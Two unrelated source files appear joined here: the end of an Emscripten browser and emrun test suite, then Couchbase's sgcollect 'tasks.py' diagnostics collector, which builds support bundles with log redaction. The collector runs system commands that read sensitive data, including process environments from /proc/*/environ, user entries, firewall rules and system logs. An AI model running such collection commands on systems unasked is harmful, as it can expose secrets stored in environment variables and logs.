if is_firefox() and '-sPROXY_TO_PTHREAD' not in args:
return self.skipTest('ff hangs on the main_thread version. browser bug?')
create_file('data.dat', 'hello, fetch')
create_file('test.txt', 'fetch 2')
try_delete('subdir')
ensure_dir('subdir')
create_file('subdir/backendfile', 'file 1')
create_file('subdir/backendfile2', 'file 2')
self.btest_exit(test_file('wasmfs/wasmfs_fetch.c'),
args=['-sWASMFS', '-sUSE_PTHREADS', '--js-library', test_file('wasmfs/wasmfs_fetch.js')] + args)
@requires_threads
@no_firefox('no OPFS support yet')
def test_wasmfs_opfs(self):
test = test_file('wasmfs/wasmfs_opfs.c')
args = ['-sWASMFS', '-pthread', '-sPROXY_TO_PTHREAD', '-O3']
self.btest_exit(test, args=args + ['-DWASMFS_SETUP'])
self.btest_exit(test, args=args + ['-DWASMFS_RESUME'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser/emmalloc_memgrowth.cpp'), expected='0', args=['-sMALLOC=emmalloc', '-sALLOW_MEMORY_GROWTH=1', '-sABORTING_MALLOC=0', '-sASSERTIONS=2', '-sMINIMAL_RUNTIME=1', '-sMAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp')
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB', '-sABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp')
# Tests that Emscripten-compiled applications can be run when there is a slash in the URL query or fragment of the .js file.
def test_browser_run_with_slash_in_query_and_hash(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O0'])
src = open('test.html').read()
# Slash in query
create_file('test-query.html', src.replace('test.js', 'test.js?type=pass/fail'))
self.run_browser('test-query.html', None, '/report_result?0')
# Slash in fragment
create_file('test-hash.html', src.replace('test.js', 'test.js#pass/fail'))
self.run_browser('test-hash.html', None, '/report_result?0')
# Slash in query and fragment
create_file('test-query-hash.html', src.replace('test.js', 'test.js?type=pass/fail#pass/fail'))
self.run_browser('test-query-hash.html', None, '/report_result?0')
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-sASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# The specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. Often that occurred within 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest_exit(test_file('pthread/test_pthread_proxy_hammer.cpp'),
args=['-sUSE_PTHREADS', '-O2', '-sPROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser/test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
def test_full_js_library_strict(self):
self.btest_exit(test_file('hello_world.c'), args=['-sINCLUDE_FULL_LIBRARY', '-sSTRICT_JS'])
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as its startup directory, and the browser will
# not close as part of the test. That pins down the cwd on Windows and makes it impossible to
# delete the directory. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941'],
args_base + ['--dump_out_directory', 'other dir/multiple', '--port', '6942']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
dump_dir = 'other dir/multiple' if '--dump_out_directory' in args else 'dump_out'
self.assertExists(self.in_dir(f'{dump_dir}/test.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/heap.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/nested/with space.dat'))
stdout = read_file(self.in_dir('stdout.txt'))
stderr = read_file(self.in_dir('stderr.txt'))
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
tasks.py
|
#!/usr/bin/env python
"""
Copyright 2016-Present Couchbase, Inc.
Use of this software is governed by the Business Source License included in
the file licenses/BSL-Couchbase.txt. As of the Change Date specified in that
file, in accordance with the Business Source License, use of this software will
be governed by the Apache License, Version 2.0, included in the file
licenses/APL2.txt.
"""
# -*- python -*-
import atexit
import base64
import glob
import gzip
import hashlib
import io
import mmap
import optparse
import os
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import time
import traceback
import urllib.error
import urllib.parse
import urllib.request
# The 'latin-1' encoding is being used since we can't guarantee that all bytes that will be
# processed through sgcollect will be decodable from 'utf-8' (which is the default in Python)
# and the decoder may fail if it encounters any such byte sequence whilst decoding byte strings.
# The 'latin-1' encoding belongs to the ISO-8859 family and is capable of decoding any byte sequence.
ENCODING_LATIN1 = 'latin-1'
# The error handler covers special cases on Windows platforms, where the cp1252
# encoding is sometimes referred to as 'latin-1' even though it does not map all possible byte values.
BACKSLASH_REPLACE = 'backslashreplace'
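# A brief illustration of the rationale above (values are only examples):
# decoding arbitrary bytes with latin-1 never raises, whereas utf-8 can fail:
#   b"\xff\xfelog line".decode('utf-8')          # raises UnicodeDecodeError
#   b"\xff\xfelog line".decode(ENCODING_LATIN1)  # -> 'ÿþlog line'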
class LogRedactor:
def __init__(self, salt, tmpdir):
self.target_dir = os.path.join(tmpdir, "redacted")
os.makedirs(self.target_dir)
self.couchbase_log = CouchbaseLogProcessor(salt)
self.regular_log = RegularLogProcessor(salt)
def _process_file(self, ifile, ofile, processor):
try:
with open(ifile, 'r', newline='', encoding=ENCODING_LATIN1, errors=BACKSLASH_REPLACE) as inp:
with open(ofile, 'w+', newline='', encoding=ENCODING_LATIN1, errors=BACKSLASH_REPLACE) as out:
# Write redaction header
out.write(self.couchbase_log.do("RedactLevel"))
for line in inp:
out.write(processor.do(line))
except IOError as e:
log("I/O error(%s): %s" % (e.errno, e.strerror))
def redact_file(self, name, ifile):
_, filename = os.path.split(name)
ofile = os.path.join(self.target_dir, filename)
self._process_file(ifile, ofile, self.regular_log)
return ofile
def redact_string(self, istring):
ostring = self.couchbase_log.do("RedactLevel")
ostring += self.regular_log.do(istring)
return ostring
class CouchbaseLogProcessor:
def __init__(self, salt):
self.salt = salt
def do(self, line):
if "RedactLevel" in line:
# salt + salt to maintain consistency with other
# occurrences of hashed salt in the logs.
return 'RedactLevel:partial,HashOfSalt:%s\n' \
% generate_hash(self.salt + self.salt).hexdigest()
else:
return line
class RegularLogProcessor:
rexes = [re.compile('(<ud>)(.+?)(</ud>)'),
# Redact the rest of the line in the case we encounter
# log-redaction-salt. Needed to redact ps output containing sgcollect flags safely.
re.compile('(log-redaction-salt)(.+)')]
def __init__(self, salt):
self.salt = salt
def _hash(self, match):
result = match.group(1)
if match.lastindex == 3:
h = generate_hash(self.salt + match.group(2)).hexdigest()
result += h + match.group(3)
elif match.lastindex == 2:
result += " <redacted>"
return result
def do(self, line):
for rex in self.rexes:
line = rex.sub(self._hash, line)
return line
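# A small sketch of the redaction behaviour above, with a hypothetical salt and
# input lines (the hash is abbreviated):
#   'user <ud>alice@example.com</ud> logged in'
#     -> 'user <ud>3f2b...e91</ud> logged in'   (sha1 of salt + tagged value)
#   'log-redaction-salt abc123'
#     -> 'log-redaction-salt <redacted>'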
def generate_hash(val):
return hashlib.sha1(val.encode())
class AltExitC(object):
def __init__(self):
self.list = []
self.lock = threading.Lock()
atexit.register(self.at_exit_handler)
def register(self, f):
self.lock.acquire()
self.register_and_unlock(f)
def register_and_unlock(self, f):
try:
self.list.append(f)
finally:
self.lock.release()
def at_exit_handler(self):
self.lock.acquire()
self.list.reverse()
for f in self.list:
try:
f()
except Exception:
pass
def exit(self, status):
self.at_exit_handler()
os._exit(status)
AltExit = AltExitC()
def log(message, end='\n'):
sys.stderr.write(message + end)
sys.stderr.flush()
class Task(object):
privileged = False
no_header = False
num_samples = 1
interval = 0
def __init__(self, description, command, timeout=None, **kwargs):
self.description = description
self.command = command
self.timeout = timeout
self.__dict__.update(kwargs)
def execute(self, fp):
"""Run the task"""
import subprocess
use_shell = not isinstance(self.command, list)
if "literal" in self.__dict__:
print(self.literal, file=fp)
return 0
env = None
if "addenv" in self.__dict__:
env = os.environ.copy()
env.update(self.addenv)
try:
p = subprocess.Popen(self.command, bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=use_shell, env=env)
except OSError as e:
# If use_shell is False then Popen may raise an exception
# if the binary is missing. In this case we mimic what the
# shell does: complain to stderr and set a non-zero status
# code. It might also automatically handle things like
# "failed to fork due to some system limit".
print("Failed to execute %s: %s" % (self.command, e), file=fp)
return 127
p.stdin.close()
from threading import Timer, Event
timer = None
timer_fired = Event()
if self.timeout is not None and hasattr(p, 'kill'):
def on_timeout():
p.kill()
timer_fired.set()
timer = Timer(self.timeout, on_timeout)
timer.start()
try:
while True:
data = p.stdout.read(64 * 1024)
if not data:
break
fp.write(data)
finally:
if timer is not None:
timer.cancel()
timer.join()
# there's a tiny chance that command succeeds just before
# timer is fired; that would result in a spurious timeout
# message
if timer_fired.is_set():
print("`%s` timed out after %s seconds" % (self.command, self.timeout), file=fp)
return p.wait()
def will_run(self):
"""Determine if this task will run on this platform."""
return sys.platform.startswith(tuple(self.platforms))
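# A minimal usage sketch (the command and log file name are hypothetical;
# LinuxTask, defined below, supplies the platforms attribute that will_run()
# consults):
#   t = LinuxTask("Example uptime", "uptime", timeout=10)
#   if t.will_run():
#       with open("example.log", "wb") as fp:
#           t.execute(fp)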
class PythonTask(object):
"""
A task that takes a python function as an argument rather than an OS command.
These will run on any platform.
"""
privileged = False
no_header = False
num_samples = 1
interval = 0
def __init__(self, description, callable, timeout=None, **kwargs):
self.description = description
self.callable = callable
self.command = "pythontask"
self.timeout = timeout
self.log_exception = False # default to false, may be overridden by val in **kwargs
self.__dict__.update(kwargs)
def execute(self, fp):
"""Run the task"""
print("log_file: {0}. ".format(self.log_file))
try:
result = self.callable()
try:
fp.write(result.encode())
except (UnicodeEncodeError, AttributeError):
fp.write(result)
return 0
except Exception as e:
if self.log_exception:
print("Exception executing python task: {0}".format(e))
return 1
def will_run(self):
"""Determine if this task will run on this platform."""
return True
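# A minimal usage sketch (description, callable and log file name are hypothetical):
#   task = PythonTask(description="Example timestamp",
#                     callable=lambda: time.strftime("%Y%m%d-%H%M%S", time.gmtime()),
#                     log_file="example.log")
#   # TaskRunner.run(task) then writes the returned string to example.log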
class TaskRunner(object):
def __init__(self, verbosity=0, default_name="couchbase.log",
tmp_dir=None):
self.files = {}
self.tasks = {}
self.verbosity = verbosity
self.start_time = time.strftime("%Y%m%d-%H%M%S", time.gmtime())
self.default_name = default_name
if not tmp_dir:
tmp_dir = None
else:
tmp_dir = os.path.abspath(os.path.expanduser(tmp_dir))
try:
self.tmpdir = tempfile.mkdtemp(dir=tmp_dir)
except OSError as e:
print("Could not use temporary dir {0}: {1}".format(tmp_dir, e))
sys.exit(1)
# If a dir wasn't passed by --tmp-dir, check if the env var was set and if we were able to use it
if not tmp_dir and os.getenv("TMPDIR") and os.path.split(self.tmpdir)[0] != os.getenv("TMPDIR"):
log("Could not use TMPDIR {0}".format(os.getenv("TMPDIR")))
log("Using temporary dir {0}".format(os.path.split(self.tmpdir)[0]))
AltExit.register(self.finalize)
def finalize(self):
try:
for fp in self.files.values():
fp.close()
except Exception:
pass
shutil.rmtree(self.tmpdir, ignore_errors=True)
def collect_file(self, filename):
"""Add a file to the list of files collected. Used to capture the exact
file (including timestamps) from the Couchbase instance.
filename - Absolute path to file to collect.
"""
if filename not in self.files:
self.files[filename] = open(filename, 'r')
else:
log("Unable to collect file '{0}' - already collected.".format(
filename))
def get_file(self, filename):
if filename in self.files:
fp = self.files[filename]
else:
fp = open(os.path.join(self.tmpdir, filename), 'wb+')
self.files[filename] = fp
return fp
def header(self, fp, title, subtitle):
separator = '=' * 78
message = f"{separator}\n{title}\n{subtitle}\n{separator}\n"
fp.write(message.encode())
def log_result(self, result):
if result == 0:
log("OK")
else:
log("Exit code %d" % result)
def run(self, task):
"""Run a task with a file descriptor corresponding to its log file"""
if task.will_run():
if hasattr(task, 'command_to_print'):
command_to_print = task.command_to_print
else:
command_to_print = task.command
log("%s (%s) - " % (task.description, command_to_print), end='')
if task.privileged and os.getuid() != 0:
log("skipped (needs root privs)")
return
if hasattr(task, 'log_file'):
filename = task.log_file
else:
filename = self.default_name
fp = self.get_file(filename)
if not task.no_header:
self.header(fp, task.description, command_to_print)
for i in range(task.num_samples):
if i > 0:
log("Taking sample %d after %f seconds - " % (i+1, task.interval), end='')
time.sleep(task.interval)
result = task.execute(fp)
self.log_result(result)
fp.flush()
elif self.verbosity >= 2:
log('Skipping "%s" (%s): not for platform %s' % (task.description, task.command_to_print, sys.platform))
def redact_and_zip(self, filename, log_type, salt, node):
files = []
redactor = LogRedactor(salt, self.tmpdir)
for name, fp in self.files.items():
if not (".gz" in name or
"expvars.json" in name or
os.path.basename(name) == "sync_gateway"):
files.append(redactor.redact_file(name, fp.name))
else:
files.append(fp.name)
prefix = f"{log_type}_{node}_{self.start_time}"
self.__make_zip(prefix, filename, files)
def zip(self, filename, log_type, node):
files = [file.name for name, file in self.files.items()]
prefix = f"{log_type}_{node}_{self.start_time}"
self.__make_zip(prefix, filename, files)
def close_all_files(self):
for name, fp in self.files.items():
fp.close()
@staticmethod
def __make_zip(prefix, filename, files):
"""Write all our logs to a zipfile"""
from zipfile import ZipFile, ZIP_DEFLATED
zf = ZipFile(filename, mode='w', compression=ZIP_DEFLATED)
try:
for name in files:
zf.write(name, f"{prefix}/{os.path.basename(name)}")
finally:
zf.close()
class SolarisTask(Task):
platforms = ['sunos5', 'solaris']
class LinuxTask(Task):
platforms = ['linux']
class WindowsTask(Task):
platforms = ['win32', 'cygwin']
class MacOSXTask(Task):
platforms = ['darwin']
class UnixTask(SolarisTask, LinuxTask, MacOSXTask):
platforms = SolarisTask.platforms + LinuxTask.platforms + MacOSXTask.platforms
class AllOsTask(UnixTask, WindowsTask):
platforms = UnixTask.platforms + WindowsTask.platforms
def make_curl_task(name, url, user="", password="", content_postprocessors=[],
timeout=60, log_file="python_curl.log",
**kwargs):
"""
NOTE: this used to use curl but was later reworked to use pure python
in order to be more cross platform, since Windows doesn't ship with curl
The content_postprocessors is a list of functions that:
- Are given a string as their only parameter
- Return a string as their only return value
For example:
def reverser(s):
return s[::-1] # reverse string
They are run in order. This allows for stripping out passwords and other
sensitive info
"""
def python_curl_task():
r = urllib.request.Request(url=url)
if user and len(user) > 0:
base64string = base64.b64encode(bytes('%s:%s' % (user, password),'utf-8'))
r.add_header("Authorization", "Basic %s" % base64string.decode('utf-8'))
try:
response_file_handle = urllib.request.urlopen(r, timeout=timeout)
except urllib.error.URLError as e:
print("WARNING: Error connecting to url {0}: {1}".format(url, e))
raise  # without a response there is nothing to post-process; propagate the failure
response_string = response_file_handle.read()
for content_postprocessor in content_postprocessors:
response_string = content_postprocessor(response_string)
return response_string
return PythonTask(
description=name,
callable=python_curl_task,
log_file=log_file,
**kwargs
)
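# A minimal usage sketch (the URL and postprocessor are hypothetical; note that
# urlopen().read() returns bytes, so postprocessors here should accept bytes):
#   def drop_secrets(body):
#       return body.replace(b"password", b"<redacted>")
#   expvar_task = make_curl_task(name="Example expvars",
#                                url="http://127.0.0.1:4985/_expvar",
#                                content_postprocessors=[drop_secrets])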
def add_gzip_file_task(sourcefile_path, salt, content_postprocessors=[]):
"""
Adds the extracted contents of a file to the output zip
The content_postprocessors is a list of functions -- see make_curl_task
"""
def python_add_file_task():
with gzip.open(sourcefile_path, 'r') as infile:
contents = infile.read().decode('utf-8')
for content_postprocessor in content_postprocessors:
contents = content_postprocessor(contents)
redactor = LogRedactor(salt, tempfile.mkdtemp())
contents = redactor.redact_string(contents)
out = io.BytesIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(contents.encode())
return out.getvalue()
log_file = os.path.basename(sourcefile_path)
task = PythonTask(
description="Extracted contents of {0}".format(sourcefile_path),
callable=python_add_file_task,
log_file=log_file,
log_exception=False,
)
task.no_header = True
return task
def add_file_task(sourcefile_path, content_postprocessors=[]):
"""
Adds the contents of a file to the output zip
The content_postprocessors is a list of functions -- see make_curl_task
"""
def python_add_file_task():
with open(sourcefile_path, 'br') as infile:
contents = infile.read()
for content_postprocessor in content_postprocessors:
contents = content_postprocessor(contents)
return contents
task = PythonTask(
description="Contents of {0}".format(sourcefile_path),
callable=python_add_file_task,
log_file=os.path.basename(sourcefile_path),
log_exception=False,
)
return task
def make_query_task(statement, user, password, port):
url = "http://127.0.0.1:%s/query/service?statement=%s" % (port, urllib.parse.quote(statement))
return make_curl_task(name="Result of query statement \'%s\'" % statement,
user=user, password=password, url=url)
def basedir():
mydir = os.path.dirname(sys.argv[0])
if mydir == "":
mydir = "."
return mydir
def make_event_log_task():
from datetime import datetime, timedelta
# I found that wmic ntevent can be extremely slow, so limit the output
# to approximately the last month.
limit = datetime.today() - timedelta(days=31)
limit = limit.strftime('%Y%m%d000000.000000-000')
return WindowsTask("Event log",
"wmic ntevent where "
"\""
"(LogFile='application' or LogFile='system') and "
"EventType<3 and TimeGenerated>'%(limit)s'"
"\" "
"get TimeGenerated,LogFile,SourceName,EventType,Message "
"/FORMAT:list" % locals())
def make_event_log_task_sg_info():
from datetime import datetime, timedelta
# I found that wmic ntevent can be extremely slow, so limit the output
# to approximately the last month.
limit = datetime.today() - timedelta(days=31)
limit = limit.strftime('%Y%m%d000000.000000-000')
return WindowsTask("SG Event log",
"wmic ntevent where "
"\""
"SourceName='SyncGateway' and "
"TimeGenerated>'%(limit)s'"
"\" "
"get TimeGenerated,LogFile,SourceName,EventType,Message "
"/FORMAT:list" % locals())
def make_os_tasks(processes):
programs = " ".join(processes)
_tasks = [
UnixTask("uname", "uname -a"),
UnixTask("time and TZ", "date; date -u"),
UnixTask("ntp time",
"ntpdate -q pool.ntp.org || "
"nc time.nist.gov 13 || "
"netcat time.nist.gov 13", timeout=60),
UnixTask("ntp peers", "ntpq -p"),
UnixTask("raw /etc/sysconfig/clock", "cat /etc/sysconfig/clock"),
UnixTask("raw /etc/timezone", "cat /etc/timezone"),
WindowsTask("System information", "systeminfo"),
WindowsTask("Computer system", "wmic computersystem"),
WindowsTask("Computer OS", "wmic os"),
LinuxTask("System Hardware", "lshw -json || lshw"),
SolarisTask("Process list snapshot", "prstat -a -c -n 100 -t -v -L 1 10"),
SolarisTask("Process list", "ps -ef"),
SolarisTask("Service configuration", "svcs -a"),
SolarisTask("Swap configuration", "swap -l"),
SolarisTask("Disk activity", "zpool iostat 1 10"),
SolarisTask("Disk activity", "iostat -E 1 10"),
LinuxTask("Process list snapshot", "export TERM=''; top -Hb -n1 || top -H n1"),
LinuxTask("Process list", "ps -AwwL -o user,pid,lwp,ppid,nlwp,pcpu,maj_flt,min_flt,pri,nice,vsize,rss,tty,stat,wchan:12,start,bsdtime,command"),
LinuxTask("Raw /proc/vmstat", "cat /proc/vmstat"),
LinuxTask("Raw /proc/mounts", "cat /proc/mounts"),
LinuxTask("Raw /proc/partitions", "cat /proc/partitions"),
LinuxTask("Raw /proc/diskstats", "cat /proc/diskstats; echo ''", num_samples=10, interval=1),
LinuxTask("Raw /proc/interrupts", "cat /proc/interrupts"),
LinuxTask("Swap configuration", "free -t"),
LinuxTask("Swap configuration", "swapon -s"),
LinuxTask("Kernel modules", "lsmod"),
LinuxTask("Distro version", "cat /etc/redhat-release"),
LinuxTask("Distro version", "lsb_release -a"),
LinuxTask("Distro version", "cat /etc/SuSE-release"),
LinuxTask("Distro version", "cat /etc/issue"),
LinuxTask("Installed software", "rpm -qa"),
# NOTE: AFAIK COLUMNS _was_ necessary, but it doesn't appear to be
# required anymore. I.e. dpkg -l correctly detects stdout as not a
# tty and stops playing smart on formatting. Let's keep it for a few
# years and then drop it, however.
LinuxTask("Installed software", "COLUMNS=300 dpkg -l"),
LinuxTask("Extended iostat", "iostat -x -p ALL 1 10 || iostat -x 1 10"),
LinuxTask("Core dump settings", "find /proc/sys/kernel -type f -name '*core*' -print -exec cat '{}' ';'"),
UnixTask("sysctl settings", "sysctl -a"),
LinuxTask("Relevant lsof output",
"echo %(programs)s | xargs -n1 pgrep | xargs -n1 -r -- lsof -n -p" % locals()),
LinuxTask("LVM info", "lvdisplay"),
LinuxTask("LVM info", "vgdisplay"),
LinuxTask("LVM info", "pvdisplay"),
MacOSXTask("Process list snapshot", "top -l 1"),
MacOSXTask("Disk activity", "iostat 1 10"),
MacOSXTask("Process list",
"ps -Aww -o user,pid,lwp,ppid,nlwp,pcpu,pri,nice,vsize,rss,tty,"
"stat,wchan:12,start,bsdtime,command"),
WindowsTask("Installed software", "wmic product get name, version"),
WindowsTask("Service list", "wmic service where state=\"running\" GET caption, name, state"),
WindowsTask("Process list", "wmic process"),
WindowsTask("Process usage", "tasklist /V /fo list"),
WindowsTask("Swap settings", "wmic pagefile"),
WindowsTask("Disk partition", "wmic partition"),
WindowsTask("Disk volumes", "wmic volume"),
UnixTask("Network configuration", "ifconfig -a", interval=10,
num_samples=2),
LinuxTask("Network configuration", "echo link addr neigh rule route netns | xargs -n1 -- sh -x -c 'ip $1 list' --"),
WindowsTask("Network configuration", "ipconfig /all", interval=10,
num_samples=2),
LinuxTask("Raw /proc/net/dev", "cat /proc/net/dev"),
LinuxTask("Network link statistics", "ip -s link"),
UnixTask("Network status", "netstat -anp || netstat -an"),
WindowsTask("Network status", "netstat -ano"),
AllOsTask("Network routing table", "netstat -rn"),
LinuxTask("Network socket statistics", "ss -an"),
LinuxTask("Extended socket statistics", "ss -an --info --processes"),
UnixTask("Arp cache", "arp -na"),
LinuxTask("Iptables dump", "iptables-save"),
UnixTask("Raw /etc/hosts", "cat /etc/hosts"),
UnixTask("Raw /etc/resolv.conf", "cat /etc/resolv.conf"),
UnixTask("Raw /etc/nsswitch.conf", "cat /etc/nsswitch.conf"),
WindowsTask("Arp cache", "arp -a"),
WindowsTask("Network Interface Controller", "wmic nic"),
WindowsTask("Network Adapter", "wmic nicconfig"),
WindowsTask("Active network connection", "wmic netuse"),
WindowsTask("Protocols", "wmic netprotocol"),
WindowsTask("Hosts file", r"type %SystemRoot%\system32\drivers\etc\hosts"),
WindowsTask("Cache memory", "wmic memcache"),
WindowsTask("Physical memory", "wmic memphysical"),
WindowsTask("Physical memory chip info", "wmic memorychip"),
WindowsTask("Local storage devices", "wmic logicaldisk"),
UnixTask("Filesystem", "df -ha"),
UnixTask("System activity reporter", "sar 1 10"),
UnixTask("System paging activity", "vmstat 1 10"),
UnixTask("System uptime", "uptime"),
UnixTask("couchbase user definition", "getent passwd couchbase"),
UnixTask("couchbase user limits", "su couchbase -c \"ulimit -a\"",
privileged=True),
UnixTask("sync_gateway user definition", "getent passwd sync_gateway"),
UnixTask("sync_gateway user limits", "su sync_gateway -c \"ulimit -a\"",
privileged=True),
UnixTask("Interrupt status", "intrstat 1 10"),
UnixTask("Processor status", "mpstat 1 10"),
UnixTask("System log", "cat /var/adm/messages"),
LinuxTask("Raw /proc/uptime", "cat /proc/uptime"),
LinuxTask("Systemd journal", "journalctl 2>&1 | gzip -c",
log_file="systemd_journal.gz", no_header=True),
LinuxTask("All logs", "tar cz /var/log/syslog* /var/log/dmesg /var/log/messages* /var/log/daemon* /var/log/debug* /var/log/kern.log* 2>/dev/null",
log_file="syslog.tar.gz", no_header=True),
LinuxTask("Relevant proc data", "echo %(programs)s | "
"xargs -n1 pgrep | xargs -n1 -- sh -c 'echo $1; cat /proc/$1/status; cat /proc/$1/limits; cat /proc/$1/smaps; cat /proc/$1/numa_maps; cat /proc/$1/task/*/sched; echo' --" % locals()),
LinuxTask("Processes' environment", "echo %(programs)s | "
r"xargs -n1 pgrep | xargs -n1 -- sh -c 'echo $1; ( cat /proc/$1/environ | tr \\0 \\n ); echo' --" % locals()),
LinuxTask("NUMA data", "numactl --hardware"),
LinuxTask("NUMA data", "numactl --show"),
LinuxTask("NUMA data", "cat /sys/devices/system/node/node*/numastat"),
UnixTask("Kernel log buffer", "dmesg -H || dmesg"),
LinuxTask("Transparent Huge Pages data", "cat /sys/kernel/mm/transparent_hugepage/enabled"),
LinuxTask("Transparent Huge Pages data", "cat /sys/kernel/mm/transparent_hugepage/defrag"),
LinuxTask("Transparent Huge Pages data", "cat /sys/kernel/mm/redhat_transparent_hugepage/enabled"),
LinuxTask("Transparent Huge Pages data", "cat /sys/kernel/mm/redhat_transparent_hugepage/defrag"),
LinuxTask("Network statistics", "netstat -s"),
LinuxTask("Full raw netstat", "cat /proc/net/netstat"),
LinuxTask("CPU throttling info", "echo /sys/devices/system/cpu/cpu*/thermal_throttle/* | xargs -n1 -- sh -c 'echo $1; cat $1' --"),
make_event_log_task(),
make_event_log_task_sg_info(),
]
return _tasks
# stolen from http://rightfootin.blogspot.com/2006/09/more-on-python-flatten.html
def iter_flatten(iterable):
it = iter(iterable)
for e in it:
if isinstance(e, (list, tuple)):
for f in iter_flatten(e):
yield f
else:
yield e
def flatten(iterable):
return [e for e in iter_flatten(iterable)]
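# For example, nested lists/tuples collapse into a single flat list:
#   flatten([1, [2, [3, 4]], (5,)]) -> [1, 2, 3, 4, 5]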
def read_guts(guts, key):
return guts.get(key, "")
def winquote_path(s):
return '"'+s.replace("\\\\", "\\").replace('/', "\\")+'"'
# Python's str.split() splits the empty string into [''], which doesn't make
# any sense for our purposes, so this function works around that.
def correct_split(string, splitchar):
rv = string.split(splitchar)
if rv == ['']:
rv = []
return rv
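# For example:
#   correct_split("", ",")      -> []
#   correct_split("a,b,c", ",") -> ['a', 'b', 'c']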
def make_stats_archives_task(guts, initargs_path):
escript = exec_name("escript")
escript_wrapper = find_script("escript-wrapper")
dump_stats = find_script("dump-stats")
stats_dir = read_guts(guts, "stats_dir")
if dump_stats is None or escript_wrapper is None or not stats_dir:
return []
return AllOsTask("stats archives",
[escript,
escript_wrapper,
"--initargs-path", initargs_path, "--",
dump_stats, stats_dir],
no_header=True,
log_file="stats_archives.json")
def make_product_task(guts, initargs_path, options):
root = os.path.abspath(os.path.join(initargs_path, "..", "..", "..", ".."))
dbdir = read_guts(guts, "db_dir")
viewdir = read_guts(guts, "idx_dir")
diag_url = "http://127.0.0.1:%s/diag?noLogs=1" % read_guts(guts, "rest_port")
if options.single_node_diag:
diag_url += "&oneNode=1"
